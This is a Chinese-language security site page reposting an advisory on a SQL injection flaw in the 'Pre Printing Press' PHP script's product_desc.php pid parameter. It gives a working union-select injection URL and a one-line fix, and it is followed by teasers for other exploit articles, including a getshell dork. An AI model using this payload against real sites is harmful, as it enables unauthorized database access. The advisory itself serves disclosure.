网站优化

首页 > 新闻资讯 > 网站优化 > Pre Printing Press product_desc.php (pid) SQL注射漏洞及修复

Pre Printing Press product_desc.php (pid) SQL注射漏洞及修复

2019-09-12 热度:193 ℃
标题: Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability
基本: Pre Printing Press
售价: $999
脚本编写: PHP
状态: vulnerable
|致谢: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
  证明
  [+] 概述
   A complete printing press website script contains all features required for online printing
   business. Developed in PHP, MYSQL and Flash AS3, with all browsers compatibility and easy
   to navigate. Package contains builtin designers to customize designs online, shopping cart
   and complete users and orders modules.Product is user friedly and can fully operate via
   secure admin panel.Script is fully customizable and ready to upload to start your printing
   press now.
  [+] 缺陷
    http://[host]/[path]/prestudio/product_desc.php?pid=[vul]
  [+] Injectable
    http:// [ www.it165.net ]/[path]/prestudio/product_desc.php?pid=1
    +union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1--+&cid=&sid=
  [+] 修复
 
过滤相应页面的参数输入

相关文章

某购物商城系统的一次渗透测试

某购物商城系统的一次渗透测试

文章有不少 关注本站 有时间就整理出来写写. Penetration testing只收集渗透测试、代码审计、工具使用和SEO类文章. 寻找web漏洞获取webshell 一般w...

返利网转换V币功能未做严格校验 导致可以兑换负值

返利网转换V币功能未做严格校验 导致可以兑换负值

返利网转换V币功能未对转换金额做严格校验,导致可以兑换负值,在后台执行简单的相减操作后,金额就变成了正数了,然后可以执行提现操作,不知道人工审核的时候是否会仔细核对资金明细,如果没有仔细...

桃园网盘通杀批量getshell漏洞

桃园网盘通杀批量getshell漏洞

谷歌关键字:inurl:guest_ly.aspx 第一:先看是否有可以测试的  “guest”  账户    ...

输入验证避免50%(只是经验值)以上的应用安全攻击

输入验证避免50%(只是经验值)以上的应用安全攻击

俗话说病从口入,可以说绝大多数的应用安全问题的源头都是由输入的入口引发,但是输入入口安全检测不能解决所有的潜在安全问题,原因很简单,那就是接收输入的数据时,接收者并不知道此数据用来做什么...

XSS报警机制

XSS报警机制

0x00 前言 在第一章结尾的时候我就已经说了,这一章将会更详细的介绍前端防火墙的报警机制及代码。在一章出来后,有人会问为什么不直接防御,而是不防御报警呢。很简单,因为防御的话,攻击者...

WordPress插件Foxypress uploadify.php可任意执行代码

WordPress插件Foxypress uploadify.php可任意执行代码

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = Exce...

web缓存之浏览器缓存

web缓存之浏览器缓存

  web缓存之浏览器缓存浅析 什么是web缓存 所谓缓存就是再copy一份数据的副本(可能是html页面,图片,文件),根据副本的存放位置不同,又可分为不同的缓存策...

phpcms v9.1.15 20120606 多处sql及XSS缺陷及修复

phpcms v9.1.15 20120606 多处sql及XSS缺陷及修复

PhpcmsV9最新版SQL注射+XSS XSS public function public_get_suggest_keyword() {    ...

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!